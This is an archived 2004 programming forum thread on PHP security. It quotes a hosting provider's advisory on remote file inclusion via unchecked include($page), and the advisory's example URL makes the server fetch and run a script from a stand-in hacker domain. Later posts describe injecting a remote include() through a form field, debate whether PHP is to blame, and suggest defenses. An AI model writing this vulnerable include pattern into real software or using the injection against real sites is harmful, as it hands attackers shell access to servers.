473,804 Members | 3,182 Online
Bytes | Software Development & Data Engineering Community
+ Post

Home Posts Topics Members FAQ

PHP blamed for security problems

Here's what this morning's security advisory read here:

``In the last 3 months we have noticed an marked increase in the number of
web-server attacks and successful compromise on our network. These are
mostly PHP-script exploits and are giving hackers easy shell access to
virtual servers, as mentioned in the PHP Security Advisory in the News
section of the control centre. We really cannot do much about these
network attacks other than to inform our customers to stay vigilant and
upgrade PHP-script software whenever newer versions become available.
The allow_url_open change to PHP is about as much as we can do here.''

They offer a more detailed description of the problem:

``Recently, we've seen an increase in malicious activity on
our servers, caused by hackers who have successfuly gained
shell access via insecure PHP scripts.

Following our own investigation of these hacked accounts, we
believe we have established the common point-of-entry for
these attacks.

As you may be aware, PHP provides a number of functions for
opening files such as 'fopen()' and it's also possible to
pass an HTTP or FTP URL to these such that
fopen('http://www.dsvr.co.uk/'); will fetch the contents of
the DSVR homepage for PHP to treat as a file.

What you may not be aware of is that functions such as
include() also allow URLs to be passed as their argument.
Since these functions cause the included file to be parsed
and executed as PHP code, this can be a major security flaw.

Many clients seem to be using PHP that looks like this:

<html>
...standard header...
<? include($page); ?>
...standard footer...
</html>

as a cheap way to manage common headers and footers. These
pages can be accessed like so:

http://www.your-domain.co.uk/index.php?page=about.inc

so that a file 'about.inc' is included inside the standard
header/footer.

However, unless the $page variable is checked for valid
content -- and input sanity checking is conspicuously absent
in many PHP scripts we encounter -- this is very open to
misuse. Malicious third parties could do the following:

http://www.your-domain.co.uk/index.p...oot-script.txt

This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05
38 3229
Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
On 2004-03-19, Tim Tyler <ti*@tt1lock.or g> wrote:
Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
[publicly expose the source code of practically everything to the attackers]
Security through obscurity is a technical phrase from cryptography.


And why wouldn't it be valid for source code exposure in general?
(As this thread is about security, and not on how desirable it would be
to have your code being public for competitors).


Uh - because it has nothing to do with cryptography.

With source code, you are preserving a trade secret.
Obscurity *is* important when you have a trade secret.

The phrase "security through obscurity" applies to cryptographic
devices - which must be fielded to be used - and once fielded it
has to be assumed that your opponent can capture one of your
transmitters and can reverse engineer it.

PHP code on a server is completely different. The code never
leaves the server. It's workings are not exposed and there's
no way to dismantle it, poke electrodes at it, or scan its
insides and - i.e. there's no way to see how it does what
it does except by looking at its inputs and outputs.

The server can be well defended. It doesn't *have* to be carried
into battle by mortal soldiers - instead, it can be placed inside
Fort Knox.

Also, note that the NSA keeps its cryptographic designs secret
for as long as they can manage. Obviously they have a different
perspective on the phrase "security through obscurity" from you.

They do this to cause a time delay between their systems being
deployed and them being captured, analysed and reverse engineered.
That same time delay is significant for software engineers
attempting to clone a system, mimic its functionality or implement
its interfaces.

Exposing practically all the files on the server - regardless of
whether they are in password-protected web directories - will
often represent a security breach.

I should not be expected to debate this simple point - it is too
obvious.
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05 #31
th******@yahoo. com wrote or quoted:
Tim Tyler <ti*@tt1lock.or g> wrote:

In this case, PHP is at fault.


IMO, that is almost like saying "the OS is at fault" for allowing users
to delete files or install software. (granted, a require() that can
slurp in and evaluate code from across the net is kind of asking for
problems)


I see a few differences - but:

Certainly, many OSes are not remotely safe aginst their own users.

That's what the "Trusted Computing Group" is trying to remedy - taking
the level of trust away from the end user - partly on the grounds that
many of them don't know what they are doing - and it would be a waste
to allow them to trash their own machines through their own idiocy.

http://www.cl.cam.ac.uk/~rja14/tcpa-faq.html
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05 #32
Tim Tyler wrote:

That's what the "Trusted Computing Group" is trying to remedy - taking
the level of trust away from the end user


Those who do not understand a tool are unlikely to use it correctly.
People who can't be trusted to use computers safely should not use them
(this goes for automobiles and firearms, as well).

This does *not* mean that I think there should be a law against it.
There is a vast difference between that which should not be done and
that which should be legally regulated, something too many people fail
to realize (which is why 40% of the USA's GNP goes to support our
government bureaucracy.)

However, people who do use them unsafely should be harshly penalized and
prevented from doing so again.

bblackmoor
2004-03-21
Jul 17 '05 #33
On 2004-03-20, Tim Tyler <ti*@tt1lock.or g> wrote:
Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
On 2004-03-19, Tim Tyler <ti*@tt1lock.or g> wrote:
> Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
[publicly expose the source code of practically everything to the attackers]
> Security through obscurity is a technical phrase from cryptography.
And why wouldn't it be valid for source code exposure in general?
(As this thread is about security, and not on how desirable it would be
to have your code being public for competitors).


Uh - because it has nothing to do with cryptography.

With source code, you are preserving a trade secret.
Obscurity *is* important when you have a trade secret.


But what makes this a problem for php and not for other languages?
Every scripting language has this "problem".
Perhaps you think compiled binaries are more "secure", in this case
there is zend's encoding engine. So i still don't see a problem that is
specific for php.
PHP code on a server is completely different. The code never
leaves the server. It's workings are not exposed and there's
no way to dismantle it, poke electrodes at it, or scan its
insides and - i.e. there's no way to see how it does what
it does except by looking at its inputs and outputs.


From this point of view, i don't see how you could blame php for being
insecure.

--
http://home.mysth.be/~timvw
Jul 17 '05 #34
Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
On 2004-03-20, Tim Tyler <ti*@tt1lock.or g> wrote:
Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
On 2004-03-19, Tim Tyler <ti*@tt1lock.or g> wrote:
> Tim Van Wassenhove <eu**@pi.be> wrote or quoted:
[publicly expose the source code of practically everything to the attackers]
> Security through obscurity is a technical phrase from cryptography.

And why wouldn't it be valid for source code exposure in general?
(As this thread is about security, and not on how desirable it would be
to have your code being public for competitors).
Uh - because it has nothing to do with cryptography.

With source code, you are preserving a trade secret.
Obscurity *is* important when you have a trade secret.


But what makes this a problem for php and not for other languages?


Nothing. That this was a problem only for PHP was never asserted.
Every scripting language has this "problem".


The problems are:

* That it's easy to write a script that accidentally allows access
to everything the webserver has access to;

* That it's possible to write a script that allows access to
everything the webserver has access to;

Not every scripting language has these problems.

Some run in sandboxes, place restrictions on file access - and so on.

PHP in "safe mode" - with an appropriate bunch of settings for
things like "open_based ir" - is an attempt to do much the same
sort of thing.
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05 #35
Brandon Blackmoor wrote:
Tim Tyler wrote:

That's what the "Trusted Computing Group" is trying to remedy - taking
the level of trust away from the end user

Those who do not understand a tool are unlikely to use it correctly.
People who can't be trusted to use computers safely should not use them
(this goes for automobiles and firearms, as well).

And wood chisels! I mean, you just wouldn't believe the damage a sharp wood
chisel can cause in the hands of a novice computer owner, ahem, I mean, novice
homeowner.
--
Joel Farris
twinkledust Designs
http://twinkledust.com

AIM chat: FarrisJoel

Q: Because it reverses the logical flow of conversation.
A: Why is top posting frowned upon?

Jul 17 '05 #36

"Joel Farris" <th*********@va lid.address> wrote in message
news:2o******** ************@co mcast.com...
Brandon Blackmoor wrote:
Tim Tyler wrote:

That's what the "Trusted Computing Group" is trying to remedy - taking
the level of trust away from the end user

Those who do not understand a tool are unlikely to use it correctly.
People who can't be trusted to use computers safely should not use them
(this goes for automobiles and firearms, as well).


And who gets to decide who is competent? You? W3C? Some other elitist
group?

The problem with attitudes like this is that they tend to not be able see
past themselves. It reminds me of a saying that a friend of mine has about
gun control laws:

"Nobody is really against gun control. Nobody is really for gun control,
either. See, I do not think you should be able to own so much as a spring
loaded cork gun. I, on the other hand, should be permitted to own rocket
propelled grenades."
Jul 17 '05 #37
"CountScubu la" <me@scantek.hot mail.com> wrote in message news:<3y******* ***********@new ssvr27.news.pro digy.com>...
True it will not include the source, but only the output, you can write a
php script to output valid code.

an example would be:

<?php
print "<?php\n";
print "// do some evil here\n";
print "?>\n";
?>

and if you included this from another site it would apear to be valid code.

I agree that it is not a PHP concern, but a lack of forethought (hey, I am
guilty too, but I get to it) the same security risks are in perl as well.
they are just easier in php.

One of the biggest things I see, is people taking data from an input from,
and writing it to a file, the doing an incude() on it. just put <?php
include(http://www.bla.com/script.php); ?> into a form input box and your
good to go


One defense is to store all your PHP files outside of the www folder?
Save for index? And hardcode the includes? As in, you have index.php
at the root level of your site, and in it it goes up a level, out of
the reach of the web, to include files, like so:

include("../header.php");
include("../footer.php");
Jul 17 '05 #38
Tim Van Wassenhove <eu**@pi.be> wrote in message news:<c3******* ******@ID-188825.news.uni-berlin.de>...
First line in the manual (So people can't say they didn't know)
The include() statement includes and evaluates the specified file.


Recently, in my own code, I've been trying to get away from include()
entirely. Instead I open the file and read it into a string. Then I
evaluate the string to see it is what I expect. Then I send it to
eval(). Include() is dangerous because you get no chance to test the
code you're about to bring in.
Jul 17 '05 #39

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics
5
1890
[PHP5] Will be security be enforced ?
by: Julien Buratto | last post by:
I don't think Php, setting safe_mode and register globals did a serious job on 4.1.x versions and above. Actually I would like to see that crapy problems beeing solved on Php5 but it seems nobody is thinking of it... Any idea ? Julien
PHP
0
1421
Security in data handling
by: Ken in Melbourne Australia | last post by:
For some Open Source (GPL licensed) programs that I am working on, I am trying to create some PHP routines for data handling with good security. The routines I have created for this are given below and I would like these reviewed for security problems or other problems that they may have. My requirements are as follows:
PHP
4
5431
[HELP] RMI & Java security (too secure!)
by: Lorenzo | last post by:
hi you all, first of all apologies for having cross-posted this message but really i did not know where to post it. please let me know what ng you consider the most suitable for the described issue. i wrote a program made by a client and a server that communicate via RMI premise 1) everything has been developed and executed on WinXP Professional and the following jre
Java
354
15932
c# is a good way to learn c
by: Montrose... | last post by:
After working in c# for a year, the only conclusion I can come to is that I wish I knew c. All I need is Linux, the gnu c compiler and I can do anything. Web services are just open sockets hooked up to interfaces. The Gtk is more than enough gui.
.NET Framework
116
7593
Security - more complex than I thought
by: Mike MacSween | last post by:
S**t for brains strikes again! Why did I do that? When I met the clients and at some point they vaguely asked whether eventually would it be possible to have some people who could read the data and some who couldn't but that it wasn't important right now. And I said, 'sure, we can do that later'. So now I've developed an app without any thought to security and am trying to apply it afterwards. Doh!, doh! and triple doh!
Microsoft Access / VBA
3
1868
Access 2002 security
by: mar10 | last post by:
I am creating a database in Access 2002 for a small firm that would like security on the tables. They want some employees to have write access only to tables, while others read-only. I have not done anything with security since way back in version '97. I'm reading some white papers I've found to gain knowledge of current security issues. My question is, can I create security problems with other access programs I have created as I...
Microsoft Access / VBA
7
1989
IIS / Web Services Security threats
by: Magdelin | last post by:
Hi, My security team thinks allowing communication between the two IIS instances leads to severe security risks. Basically, we want to put our presentation tier on the perimeter network and the business tier inside the fire wall or internal network. The biz tier will be developed and deployed as web services on IIS. I know microsoft recommends this architecture but I am not able to convince my security team. They say IIS is vulnerable...
.NET Framework
15
10516
Security - PHP Vs Java
by: himilecyclist | last post by:
My State government organization has written a PHP/MySQL application which has been in production for about 6 months and has been highly successful. We are now embarking on a similar database application, but one with much higher security concerns (birth data). Prior to beginning the project, we met with an oversight committee who strongly advised against PHP and suggested Java. Their concern was that PHP could not be trusted to...
PHP
1
1211
Re: bad software blamed for bad quarter / are programmers obsolete?
by: Peter Morris | last post by:
The problems with software development these days as I see them are 01: Hiring crap coders. Some companies seem as though they like to fill seats or something and will hire someone with very poor skills. 02: Unrealistic deadlines. People rarely seem to plan for the unexpected these days. They seem to give an estimate of how long something should take if everything goes to plan, which never happens. 03: Coders not speaking out or...
C# / C Sharp
0
9706
marktang
What is ONU?
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However, people are often confused as to whether an ONU can Work As a Router. In this blog post, we’ll explore What is ONU, What Is Router, ONU & Router’s main usage, and What is the difference between ONU and Router. Let’s take a closer look ! Part I. Meaning of...
General
0
9577
Changing the language in Windows 10
by: Hystou | last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can effortlessly switch the default language on Windows 10 without reinstalling. I'll walk you through it. First, let's disable language synchronization. With a Microsoft account, language settings sync across devices. To prevent any complications,...
Windows Server
0
10569
Oralloy
Problem With Comparison Operator <=> in G++
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed. This is as boiled down as I can make it. Here is my compilation command: g++-12 -std=c++20 -Wnarrowing bit_field.cpp Here is the code in...
C / C++
1
10315
The easy way to turn off automatic updates for Windows 10/11
by: Hystou | last post by:
Overview: Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...
Windows Server
0
10075
tracyyun
Discussion: How does Zigbee compare with other wireless protocols in smart home applications?
by: tracyyun | last post by:
Dear forum friends, With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each protocol has its own unique characteristics and advantages, but as a user who is planning to build a smart home system, I am a bit confused by the choice of these technologies. I'm particularly interested in Zigbee because I've heard it does some...
General
0
6847
Couldn’t get equations in html when convert word .docx file to html file in C#.
by: conductexam | last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one. At the time of converting from word file to html my equations which are in the word document file was convert into image. Globals.ThisAddIn.Application.ActiveDocument.Select();...
C# / C Sharp
0
5519
Trying to create a lan-to-lan vpn between two differents networks
by: TSSRALBI | last post by:
Hello I'm a network technician in training and I need your help. I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs. The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols. I succeeded, with both firewalls in the same network. But I'm wondering if it's possible to do the same thing, with 2 Pfsense firewalls...
Networking - Hardware / Configuration
0
5651
Windows Forms - .Net 8.0
by: adsilva | last post by:
A Windows Forms form does not have the event Unload, like VB6. What one acts like?
Visual Basic .NET
2
3815
muto222
How to add payments to a PHP MySQL app.
by: muto222 | last post by:
How can i add a mobile payment intergratation into php mysql website.
PHP

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.

BYTES.COM © 2024
About Bytes
Terms Of Use
Privacy Policy
Sitemap
Advertise on Bytes
How to Post and Respond on Bytes
How to Promote and Link on Bytes
How to increase your Ranking on Bytes
Become a Recognized Expert on Bytes
Feedback Welcomed! Contact Us